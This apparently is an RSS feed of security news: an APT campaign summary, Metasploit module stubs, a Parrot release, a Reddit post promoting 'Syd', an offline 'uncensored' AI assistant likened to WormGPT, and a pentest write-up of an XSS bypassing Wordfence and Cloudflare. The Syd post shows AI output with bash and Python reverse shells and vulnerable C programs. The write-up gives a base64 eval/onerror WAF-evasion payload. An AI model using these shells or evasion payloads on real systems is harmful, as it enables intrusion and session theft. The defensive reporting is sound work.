<guid isPermaLink="true">https://tsecurity.de/de/2898951/hacking/ung0002-deploys-weaponized-lnk-files-with-cobalt-strike-and-metasploit-to-target-organizations/</guid>
<pubDate>Mon, 21 Jul 2025 23:21:20 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Seqrite Labs APT-Team has uncovered a persistent threat entity, UNG0002 (Unknown Group 0002), orchestrating espionage-driven operations across Asian jurisdictions, including China, Hong Kong, and Pakistan. Active since at least May 2024, this South-East Asia-based cluster has demonstrated a high degree of adaptability and technical prowess, targeting critical sectors such as defense, civil aviation, electrotechnical engineering, […]</p>
<p>The post <a href="https://gbhackers.com/ung0002-deploys-weaponized-lnk-files/">UNG0002 Deploys Weaponized LNK Files with Cobalt Strike and Metasploit to Target Organizations</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[UNG0002 Group Hits China, Hong Kong, Pakistan Using LNK Files and RATs in Twin Campaigns]]></title>
<description><![CDATA[Multiple sectors in China, Hong Kong, and Pakistan have become the target of a threat activity cluster tracked as UNG0002 (aka Unknown Group 0002) as part of a broader cyber espionage campaign.
"This threat entity demonstrates a strong preference for using shortcut files (LNK), VBScript, and post...]]></description>
<link>https://tsecurity.de/de/2895369/it-security-nachrichten/ung0002-group-hits-china-hong-kong-pakistan-using-lnk-files-and-rats-in-twin-campaigns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2895369/it-security-nachrichten/ung0002-group-hits-china-hong-kong-pakistan-using-lnk-files-and-rats-in-twin-campaigns/</guid>
<pubDate>Fri, 18 Jul 2025 21:34:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Multiple sectors in China, Hong Kong, and Pakistan have become the target of a threat activity cluster tracked as UNG0002 (aka Unknown Group 0002) as part of a broader cyber espionage campaign.
"This threat entity demonstrates a strong preference for using shortcut files (LNK), VBScript, and post-exploitation tools such as Cobalt Strike and Metasploit, while consistently deploying CV-themed]]></content:encoded>
</item>
<item>
<title><![CDATA[Roundcube 1.6.10 Remote Code Execution (RCE)]]></title>
<description><![CDATA[Topic: Roundcube 1.6.10 Remote Code Execution (RCE) Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></description>
<link>https://tsecurity.de/de/2893472/sicherheitsluecken/roundcube-1610-remote-code-execution-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2893472/sicherheitsluecken/roundcube-1610-remote-code-execution-rce/</guid>
<pubDate>Thu, 17 Jul 2025 22:40:13 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: Roundcube 1.6.10 Remote Code Execution (RCE) Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></content:encoded>
</item>
<item>
<title><![CDATA[Parrot 6.4 released]]></title>
<description><![CDATA[Parrot is a Debian-based
distribution with an emphasis on security improvement and tools; the 6.4
release is now available.  "Many tools, like Metasploit, Sliver,
Caido and Empire received important updates, the Linux kernel was updated
to a more recent version, and the latest LTS version of Fire...]]></description>
<link>https://tsecurity.de/de/2886134/linux-tipps/parrot-64-released/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2886134/linux-tipps/parrot-64-released/</guid>
<pubDate>Mon, 14 Jul 2025 22:36:01 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://www.parrotsec.org/">Parrot</a> is a Debian-based
distribution with an emphasis on security improvement and tools; the <a href="https://www.parrotsec.org/blog/2025-07-07-parrot-6.4-release-notes">6.4
release</a> is now available.  "<q>Many tools, like Metasploit, Sliver,
Caido and Empire received important updates, the Linux kernel was updated
to a more recent version, and the latest LTS version of Firefox was
provided with all our privacy oriented patches.</q>".]]></content:encoded>
</item>
<item>
<title><![CDATA[ISPConfig language_edit.php PHP Code Injection]]></title>
<description><![CDATA[Topic: ISPConfig language_edit.php PHP Code Injection Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></description>
<link>https://tsecurity.de/de/2882772/sicherheitsluecken/ispconfig-languageeditphp-php-code-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2882772/sicherheitsluecken/ispconfig-languageeditphp-php-code-injection/</guid>
<pubDate>Sat, 12 Jul 2025 23:08:08 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: ISPConfig language_edit.php PHP Code Injection Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></content:encoded>
</item>
<item>
<title><![CDATA[meet Syd]]></title>
<description><![CDATA[Hey folks as some of you know I’ve been quietly building a fully offline AI assistant called Syd designed specifically for pentesters, red teamers, cybersecurity researchers, and even hobbyist hackers. What makes Syd different? What is Syd? Syd is a local, uncensored AI assistant that runs entire...]]></description>
<link>https://tsecurity.de/de/2870093/reverse-engineering/meet-syd/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2870093/reverse-engineering/meet-syd/</guid>
<pubDate>Sun, 06 Jul 2025 08:08:22 +0200</pubDate>
<category>🕵️ Reverse Engineering</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hey folks as some of you know</p> <p>I’ve been quietly building a fully offline AI assistant called Syd designed specifically for pentesters, red teamers, cybersecurity researchers, and even hobbyist hackers.</p> <p>What makes Syd different?</p> <p>What is Syd?</p> <p>Syd is a local, uncensored AI assistant that runs entirely offline using [Mistral 7B + llama.cpp] and my own custom RAG pipeline. No API keys, no OpenAI backend, no data leaks. You own everything.</p> <p>What Syd Can Do:</p> <p>Answer pentest-style questions using your own embedded exploit data (ExploitDB, CVEs, payloads, etc.)</p> <p>Generate custom payloads (e.g., Sliver, Metasploit, Python/C shells) for learning and research</p> <p>Summarize, explain, and simulate complex attacks (buffer overflows, format string, privilege escalation, etc.)</p> <p>Allow users to embed their own content, cheat sheets, codebases, training notes — anything you want it to learn from</p> <p>No logging, no cloud access, zero external calls, fully auditable</p> <p>Works similarly to WormGPT but runs 100% locally, and you control every byte of input and output</p> <p>Is It Legal?</p> <p>Yes — all demo outputs shown below are textbook, public-domain examples used by ethical hackers and CTF competitors every day. There is no malicious intent, and this is not a tool for real-world exploitation — it’s for educational research, red team simulation, and local training environments like DVWA, Sliver C2, etc.</p> <p>Example Q&amp;A Session With Syd</p> <p>Here’s a real simulated CLI session with Syd answering progressively more advanced questions — from reverse shells to format string exploits to generating actual code.</p> <p>(syd-env) pa249@MSI:~/syd$ python scripts/ask_syd.py</p> <p>✅ Mistral model loaded successfully.</p> <p>🧠 Syd is ready. Ask a question below. Type 'exit' to quit.</p> <p>🔍 Enter your question: what is a reverse shell</p> <p>🔍 Embedding your question...</p> <p>🔍 Searching for top 5 relevant chunks...</p> <p>✅ Found 5 relevant file paths.</p> <p>📄 Reading content from files with token limits...</p> <p>- Added 532 tokens from 48239.txt</p> <p>✅ Successfully added content from 1 sources using ~532 tokens.</p> <p>🧠 Building prompt with context...</p> <p>✅ Prompt built with 2131 characters of context (~557 tokens).</p> <p>🤖 Generating response...</p> <p>llama_perf_context_print: load time = 14485.05 ms</p> <p>llama_perf_context_print: prompt eval time = 14484.71 ms / 666 tokens</p> <p>llama_perf_context_print: eval time = 95521.87 ms / 744 runs</p> <p>llama_perf_context_print: total time = 110359.95 ms / 1410 tokens</p> <p>💬 Syd: A reverse shell is a type of shell where the target machine opens a connection to an attacking machine, which then has access to the shell. It’s typically used by attackers to bypass firewall rules that block incoming connections but allow outbound connections. An example command on Linux would be:</p> <p>bash -i &gt;&amp; /dev/tcp/ATTACKER_IP/PORT 0&gt;&amp;1</p> <p>🔍 Enter your question: write a C program vulnerable to buffer overflow</p> <p>🔍 Embedding your question...</p> <p>🔍 Searching for top 5 relevant chunks...</p> <p>✅ Found 5 relevant file paths.</p> <p>📄 Reading content from files with token limits...</p> <p>- Added 538 tokens from 15005.txt</p> <p>🧠 Building prompt with context...</p> <p>✅ Prompt built with ~678 tokens.</p> <p>🤖 Generating response...</p> <p>llama_perf_context_print: load time = 15061.44 ms</p> <p>llama_perf_context_print: prompt eval time = 15061.04 ms / 667 tokens</p> <p>llama_perf_context_print: eval time = 132502.58 ms / 1023 runs</p> <p>llama_perf_context_print: total time = 148154.19 ms / 1690 tokens</p> <p>💬 Syd: Here's a vulnerable C program:</p> <p>#include &lt;stdio.h&gt;</p> <p>#include &lt;string.h&gt;</p> <p>void vulnerable(char *input) {</p> <p>char buffer[64];</p> <p>strcpy(buffer, input);</p> <p>printf("You entered: %s\n", buffer);</p> <p>}</p> <p>int main(int argc, char *argv[]) {</p> <p>if (argc != 2) {</p> <p>printf("Usage: %s &lt;input&gt;\n", argv[0]);</p> <p>return 1;</p> <p>}</p> <p>vulnerable(argv[1]);</p> <p>return 0;</p> <p>}</p> <p>Compile with: gcc -fno-stack-protector -z execstack vuln.c -o vuln</p> <p>Exploit with input longer than 64 bytes to overwrite return address.</p> <p>🔍 Enter your question: give me a reverse shell in Python</p> <p>🔍 Embedding your question...</p> <p>🔍 Searching for top 5 relevant chunks...</p> <p>✅ Found 5 relevant file paths.</p> <p>📄 Reading content from files with token limits...</p> <p>🧠 Building prompt with context...</p> <p>✅ Prompt built with ~59 tokens.</p> <p>🤖 Generating response...</p> <p>llama_perf_context_print: prompt eval time = 1185.29 ms / 57 tokens</p> <p>llama_perf_context_print: eval time = 23589.94 ms / 203 runs</p> <p>llama_perf_context_print: total time = 24822.14 ms / 260 tokens</p> <p>💬 Syd: Here’s a basic Python reverse shell:</p> <p>import socket,subprocess,os</p> <p>s=socket.socket();s.connect(("10.0.0.1",4444))</p> <p>os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2)</p> <p>subprocess.call(["/bin/sh"])</p> <p>Listen on your attack machine using: nc -lvnp 4444</p> <p>🔍 Enter your question: simulate a format string vulnerability with GOT overwrite</p> <p>🔍 Embedding your question...</p> <p>🔍 Searching for top 5 relevant chunks...</p> <p>✅ Found 5 relevant file paths.</p> <p>📄 Reading content from files with token limits...</p> <p>- Added 547 tokens from 11786.txt</p> <p>🧠 Building prompt with context...</p> <p>✅ Prompt built with ~1147 tokens.</p> <p>🤖 Generating response...</p> <p>llama_perf_context_print: prompt eval time = 23271.13 ms / 1112 tokens</p> <p>llama_perf_context_print: eval time = 135150.15 ms / 1023 runs</p> <p>llama_perf_context_print: total time = 159090.38 ms / 2135 tokens</p> <p>💬 Syd: A format string vulnerability occurs when user input is used as a format string in functions like printf. Here's a simple example:</p> <p>#include &lt;stdio.h&gt;</p> <p>void vulnerable(char *input) {</p> <p>printf(input); // Vulnerable line</p> <p>}</p> <p>int main(int argc, char *argv[]) {</p> <p>vulnerable(argv[1]);</p> <p>return 0;</p> <p>}</p> <p>To leak memory: ./vuln %x %x %x %x</p> <p>To overwrite GOT, carefully craft a payload using %n format. Requires knowing GOT address and stack offset. Often used in conjunction with a script like pwntools.</p> <p>I’m still actively developing Syd and plan to offer it as a <strong>one-time license</strong> product — not a subscription, no telemetry, no bullshit. Would love your thoughts. Would this be useful to you or your team? What features would <em>you</em> want to see added?</p> <p>Cheers,</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Glass-Ant-6041"> /u/Glass-Ant-6041 </a> <br> <span><a href="http://arm-solutions.co.uk/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ReverseEngineering/comments/1lsu23u/meet_syd/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[XSS Vulnerability in “Get a Quote” while bypassing WordFence and CloudFlare]]></title>
<description><![CDATA[XSS Vulnerability in “Get a Quote” while bypassing WordFence and CloudFlare
				
				
			
			
				
				
				
				
			
				
				
				
				
				
				
				
				
				
				
				
				 Post Views: 16
			
			
			
				
				
				
				
			
				
				
				
				
				
				
				
				
				
				
				Reading Time...]]></description>
<link>https://tsecurity.de/de/2854043/it-security-nachrichten/xss-vulnerability-in-get-a-quote-while-bypassing-wordfence-and-cloudflare/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2854043/it-security-nachrichten/xss-vulnerability-in-get-a-quote-while-bypassing-wordfence-and-cloudflare/</guid>
<pubDate>Thu, 26 Jun 2025 22:18:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="et_pb_section et_pb_section_5 et_section_specialty">
				
				
				
				
				
				<div class="et_pb_row">
				<div class="et_pb_column et_pb_column_3_4 et_pb_column_10   et_pb_specialty_column  et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_row_inner et_pb_row_inner_22">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_22 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_post_title et_pb_post_title_5 et_pb_bg_layout_light  et_pb_text_align_left">
				
				
				
				
				
				<div class="et_pb_title_container">
					<h1 class="entry-title">XSS Vulnerability in “Get a Quote” while bypassing WordFence and CloudFlare</h1>
				</div>
				
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_23">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_23 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_65  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong><div class="post-views content-post post-285170 entry-meta load-static">
				<span class="post-views-icon dashicons dashicons-chart-bar"></span> <span class="post-views-label">Post Views:</span> <span class="post-views-count">16</span>
			</div></strong></p></div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_24">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_24 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_66  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p>Reading Time: 5 Minutes</p></div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_25">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_25 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_67  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 class="post_title"><strong>Introduction</strong></h2>
<p>While automated tools are useful for maintaining baseline security, they often miss sophisticated, multi-layered vulnerabilities that require a manual, strategic approach to uncover. At Black Hat Ethical Hacking (BHEH), our Red Team employs advanced manual testing, real-world attack simulations, and in-depth system analysis to uncover vulnerabilities that automated methods often overlook. This process highlights the importance of human expertise and creativity in identifying and exploiting complex weaknesses that could compromise even well-protected systems.</p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_68 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>See Also: So you want to be a hacker?<br><a href="https://www.blackhatethicalhacking.com/courses/offensive-security-and-ethical-hacking-course/">Offensive Security and Ethical Hacking Course</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_69  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 class="post_title"><strong>Executive Summary</strong></h2>
<p>An external penetration test uncovered a Cross-Site Scripting (XSS) vulnerability in the newly introduced <strong>“Get a Quote”</strong> form on the client’s website. This weakness allows malicious script injection via user input, which was <strong>not caught by existing defenses</strong> (including Wordfence and Cloudflare Web Application Firewall). As a result, an attacker could execute arbitrary JavaScript in the context of the website, potentially leading to session theft or site defacement. The finding underscores a significant security gap in a recent feature, warranting immediate remediation and improved defensive measures.</p>
<p><em>Security Lesson Learned: Even with multiple security layers like Wordfence and Cloudflare in place, only proper input validation and output encoding at the application level can effectively prevent XSS vulnerabilities.</em></p>
<p>The following report details each stage of the attack, the associated risks, and concrete remediation strategies.</p>
<h2 class="post_title"><strong>Overview of the Issue Discovered</strong></h2>
<p>The vulnerability was identified in a recently deployed <strong>“Get a Quote” form</strong> that had not undergone prior security testing. During a manual examination, it was observed that this form processes user-supplied data (such as contact details or query parameters) without sufficient sanitization. The feature’s novelty meant it fell outside previous test coverage, and its implementation introduced an XSS flaw. In practical terms, an attacker is able to inject crafted JavaScript payloads through this form. The application then includes this unneutralized input in a web page response, enabling the code to execute in users’ browsers. The discovery highlights how new functionalities, if not rigorously tested, can inadvertently open severe security holes.</p>
<h3><span><strong>Weakness Type</strong></span></h3>
<ul>
<li><strong>CWE-79</strong>: <em>Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)</em> – occurs when an application includes untrusted input in web pages without proper validation or escaping, allowing execution of attacker-supplied scripts in the victim’s browser.</li>
<li><strong>CWE Reference:</strong> <a href="https://cwe.mitre.org/data/definitions/79.html">CWE-79</a></li>
<li><strong>Weakness Type</strong>: Client-Side Code Injection</li>
<li><strong>Primary Risks:</strong>
<ul>
<li>Unauthorized execution of JavaScript in users’ browsers</li>
<li>Theft of session cookies and authentication tokens</li>
<li>Account hijacking, including admin takeover if targeted</li>
<li>Injection of malicious content (e.g. phishing forms, malware links)</li>
<li>Bypass of client-side/business logic (e.g. hidden form field manipulation)</li>
<li>Exposure of sensitive data via DOM-based access</li>
<li>Persistence through stored XSS in application logs or databases</li>
</ul>
</li>
</ul>
<h3><span><strong>Severity</strong></span></h3>
<p><strong>High</strong>: XSS vulnerability in a publicly accessible form allows unauthenticated attackers to inject and execute JavaScript, bypassing Wordfence and Cloudflare protections, potentially leading to session hijacking, data exfiltration, and full account compromise (including admin access if targeted).</p>
<p><strong>Base Score: <span>8.3 (High)</span></strong></p>
<p>This vulnerability carries a CVSS v3 base score of <strong>8.3 (High)</strong>. The weakness type is improper input handling (CWE-79) that permits malicious client-side code injection via unsanitized parameters in an AJAX request, enabling attacker-controlled scripts to execute in user sessions and evade existing WAF defenses.</p>
<h3><strong>Affected Assets</strong></h3>
<ul>
<li><strong>IPv4 Address</strong>: 192.x.x.x</li>
<li><strong>Hostname</strong>: Redacted</li>
<li><strong>System Type</strong>: Main Website with Contact Form</li>
</ul>
<p>This discovery represents a high-severity security flaw due to the ability of unauthenticated attackers to inject and execute arbitrary scripts in the context of legitimate users, potentially compromising user sessions, stealing credentials, and undermining trust in the website’s integrity.</p>
<h2><strong>Impact and Risks</strong></h2>
<p>This issue is classified as a <strong>Cross-Site Scripting (XSS)</strong> vulnerability, specifically <strong>CWE-79: Improper Neutralization of Input During Web Page Generation</strong>. In this scenario, unsanitized user input submitted via the public <strong>“Get a Quote”</strong> form is reflected back into the application’s response without appropriate encoding, allowing client-side script execution within a victim’s browser. This flaw enables attackers to inject malicious JavaScript payloads, effectively altering the behavior of the page and performing actions on behalf of unsuspecting users.</p>
<p>What makes this vulnerability particularly dangerous is its <strong>stealthy nature</strong> and <strong>resistance to automated detection</strong>. Both <strong>Wordfence</strong>, a well-known WordPress security plugin, and <strong>Cloudflare’s WAF</strong> were in place and actively filtering malicious input — yet this XSS was not caught by either system. The payloads used in the attack were <strong>manually crafted and refined</strong>, encoded using <strong>Base64 obfuscation</strong> and alternate vectors (e.g., event attributes in HTML elements) to <strong>bypass standard WAF signatures</strong>. This type of targeted evasion is not typical of automated attacks and demonstrates a <strong>realistic, high-skill adversary scenario</strong>.</p>
<p>The vulnerability is <strong>unauthenticated</strong>, affecting a public-facing form and allowing external attackers to exploit users — including privileged sessions — without any prior access. If a user with administrative privileges interacts with a malicious submission (e.g., viewing quote requests from the backend or moderation panel), the attacker could potentially hijack the admin session and escalate privileges further within the application.</p>
<p>Given the context, the attack vector, the criticality of the impacted asset (a public production system), and the ineffectiveness of layered defenses in stopping the exploit, this vulnerability presents a <strong>high-severity business and technical risk</strong>.</p>
<h3><strong>Primary Risk Impacts</strong></h3>
<ul>
<li><strong>Session Hijacking:</strong> Theft of user or admin session cookies can lead to unauthorized access to sensitive accounts.</li>
<li><strong>Privilege Escalation:</strong> If an administrator views a malicious payload, the attacker can gain elevated privileges and deeper access to the backend.</li>
<li><strong>Website Defacement or Content Injection:</strong> Scripts can alter visual elements, insert misleading information, or load external malicious resources.</li>
<li><strong>Data Exfiltration:</strong> User-submitted data (such as quote form content) can be harvested by attackers through injected JavaScript.</li>
<li><strong>Reputation Damage:</strong> Public compromise of a business-critical form can erode user trust and harm brand credibility.</li>
<li><strong>Security Control Evasion:</strong> Wordfence and Cloudflare WAFs were bypassed, demonstrating a breakdown in perimeter and application-layer defenses.</li>
<li><strong>Stealthy Persistence:</strong> Lack of alerts/logs due to WAF evasion increases dwell time and allows sustained exploitation without detection.</li>
</ul>
<h3><strong>Key Considerations</strong></h3>
<ul>
<li>This was <strong>not a common or trivial XSS</strong> — the successful payload required <strong>manual analysis, payload tuning, and WAF bypass techniques</strong>.</li>
<li>The attacker exploited <strong>parameters not previously evaluated</strong> in earlier assessments (e.g., <code>country</code>, <code>action</code> in AJAX POST).</li>
<li>Traditional security tools and default configurations failed to identify or block the threat — indicating a <strong>gap in depth of protection</strong>.</li>
</ul></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_70 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>See Also: <a href="https://www.blackhatethicalhacking.com/tools/adminpbuster/">Offensive Security Tool: Admin Panel Buster</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_71  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 class="post_title"><strong>Technical Description</strong></h2>
<h3><strong>Blue Team Perspective – Detection/Blocking Failures</strong></h3>
<p>From a defensive standpoint, the security controls in place did log and attempt to block some XSS injection attempts, but the malicious input ultimately slipped through. The site’s WordPress security plugin (Wordfence) and Cloudflare WAF were configured to filter common attack patterns. Initial test payloads – such as a simple <code>&lt;script&gt;alert('XSS')&lt;/script&gt;</code> – triggered Wordfence’s rules and were blocked with HTTP 403 errors, indicating the WAF recognized the attack signature.</p>
<figure><img decoding="async" class="wp-image-285180 alignnone size-full" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/xss-blocked-wordfence-1.png" alt="" width="1910" height="963" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/xss-blocked-wordfence-1.png 1910w, https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/xss-blocked-wordfence-1-1280x645.png 1280w, https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/xss-blocked-wordfence-1-980x494.png 980w, https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/xss-blocked-wordfence-1-480x242.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) and (max-width: 1280px) 1280px, (min-width: 1281px) 1910px, 100vw"><figcaption><strong>Figure 1:</strong> Wordfence WAF blocking a simple script injection payload and issuing a 403 Forbidden response with a generic warning banner.</figcaption></figure>
<blockquote>
<p><strong>Blue Team Note:</strong> While baseline protections are active, the use of known XSS vectors was insufficient. WAF systems relying on static signatures often miss obfuscated or context-aware payloads. This block confirms Wordfence works on common strings but fails under evasion pressure.</p>
</blockquote>
<p>However, the payload that was eventually used by BHEH’s Red Team was more complex and bypassed these filters. It appears the defensive systems were relying on signature-based detection, which was evaded by the obfuscation techniques employed (described below). Cloudflare’s cloud WAF also did not flag the payload, suggesting that its managed rules either were not aggressive enough or did not interpret the obfuscated script as a threat. The failure in detection highlights a gap in the Blue Team’s coverage: advanced or encoded XSS payloads were not accounted for in the current WAF rule sets, allowing the attack to proceed unhindered.</p>
<p>Despite Wordfence blocking the direct attack string, no alert or block was generated for the successful payload. The logs would show normal traffic for that request, meaning the attack flew under the radar. Cloudflare’s dashboard likewise did not register a WAF event for the bypass. In effect, the malicious request blended in with legitimate traffic.</p>
<h3><strong>Red Team Perspective – Exploitation via Obfuscated Payload</strong></h3>
<p>From the attacker (Red Team) perspective, exploiting this vulnerability required manual payload crafting and the use of Burp Suite for testing. Automated scanners did not flag the issue, likely because the injection point was an AJAX endpoint not covered by basic crawlers, and default payloads were getting blocked by the WAF. The tester used Burp Suite Intruder to systematically try different XSS payload variations, observing which requests were blocked and which got through.</p>
<figure><img decoding="async" class="wp-image-285181 alignnone size-full" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/xss_poc_intruder_burp_success.png" alt="" width="1910" height="963" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/xss_poc_intruder_burp_success.png 1910w, https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/xss_poc_intruder_burp_success-1280x645.png 1280w, https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/xss_poc_intruder_burp_success-980x494.png 980w, https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/xss_poc_intruder_burp_success-480x242.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) and (max-width: 1280px) 1280px, (min-width: 1281px) 1910px, 100vw"><figcaption><strong>Figure 2:</strong> Burp Intruder showing differentiation between blocked (403) and bypassed (200) payloads. Obfuscated scripts triggered no alerts.</figcaption></figure>
<blockquote>
<p><strong>Blue Team Note:</strong> Intruder output clearly highlights discrepancies in response status and size. This visual evidence shows the WAF did not normalize or decode payloads before inspection, allowing attacker-crafted inputs to slip through undetected.</p>
</blockquote>
<p>Dozens of known XSS vectors (with varying encodings and syntaxes) were tested in the vulnerable field. Eventually, a payload was identified that slipped past Wordfence and Cloudflare filters. The winning payload involved base64 encoding parts of the script and leveraging a browser decoding function. For example, an <code>&lt;img&gt;</code> tag’s <code>onerror</code> attribute was used to execute <code>eval(atob('YWxlcnQoJ1hTUycp'))</code>. In this construct, the actual attack code (such as <code>alert('XSS')</code>) is hidden in Base64 form. The browser’s built-in <code>atob()</code> function decodes the string at runtime, and <code>eval()</code> executes it. This two-step indirection meant that the literal text <code>alert(</code> or <code>&lt;script&gt;</code> never appeared in the request — bypassing signature-based filters.</p>
<p>Another variant used a <code>&lt;div style="background-image:url(javascript:…)"&gt;</code> CSS injection, exploiting how CSS <code>url()</code> can execute JavaScript in some contexts. The final working exploit combined these ideas to ensure the payload looked innocuous to defensive eyes but still executed in the browser.</p>
<figure><img decoding="async" class="wp-image-285182 alignnone size-full" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/vulnerablepostrequest_xss_poc.png" alt="" width="1910" height="963" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/vulnerablepostrequest_xss_poc.png 1910w, https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/vulnerablepostrequest_xss_poc-1280x645.png 1280w, https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/vulnerablepostrequest_xss_poc-980x494.png 980w, https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/vulnerablepostrequest_xss_poc-480x242.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) and (max-width: 1280px) 1280px, (min-width: 1281px) 1910px, 100vw"><figcaption><strong>Figure 3:</strong> Successful POST request captured in Burp Suite Repeater showing a base64-obfuscated XSS payload injected through the <code>country</code> parameter and accepted with a 200 OK.</figcaption></figure>
<blockquote>
<p><strong>Blue Team Note:</strong> This bypass is critical — not only did the WAFs fail to flag it, but the server logic also rendered the injected string back to the client without escaping. This means the application’s output encoding is not context-aware.</p>
</blockquote>
<h3><strong>Client-Side Execution and Validation</strong></h3>
<p>Once the payload reached the server, the vulnerability in the application’s code took effect: the malicious input was included unsanitized in the response. The response for the AJAX request contained the injected snippet, which the browser then executed when rendering the update. In testing, this was confirmed by observing the expected proof-of-concept behavior (in this case, a JavaScript alert firing). The XSS fired successfully, proving that an attacker’s code can run on the site by exploiting this flaw.</p>
<figure><img decoding="async" class="wp-image-285183 alignnone size-full" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/xss_Success_poc.png" alt="" width="689" height="324" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/xss_Success_poc.png 689w, https://www.blackhatethicalhacking.com/wp-content/uploads/2025/06/xss_Success_poc-480x226.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 689px, 100vw"><figcaption><strong>Figure 4:</strong> Proof-of-concept image showing that the payload was executed successfully in the browser after being injected through the vulnerable field.</figcaption></figure>
<blockquote>
<p><strong>Blue Team Note:</strong> This confirms both reflection and execution in the browser. Even if persistence is not achieved, this type of injection is highly useful for phishing, session hijacking, or pivoting to stored XSS depending on backend storage behavior.</p>
</blockquote>
<h3><strong>Observed Behavior in Production UI</strong></h3>
<p>The final verification step was to observe how the injection behaved in the production web interface. The injected payload was passed through the backend and rendered as part of the dynamic dropdown for selecting ZIP codes based on country. No errors were logged or surfaced to the user. The response appeared normal (with the placeholder “Select zipcode”), while the XSS script executed silently.</p>
<blockquote>
<p><strong>Blue Team Note:</strong> Even UI elements like dropdowns are viable XSS attack surfaces if inputs are reflected directly. Defensive coding should never assume dropdowns, tables, or modals are “safe zones.” Validate and escape everywhere.</p>
</blockquote>
<h3><strong>Key Technical Summary</strong></h3>
<ul>
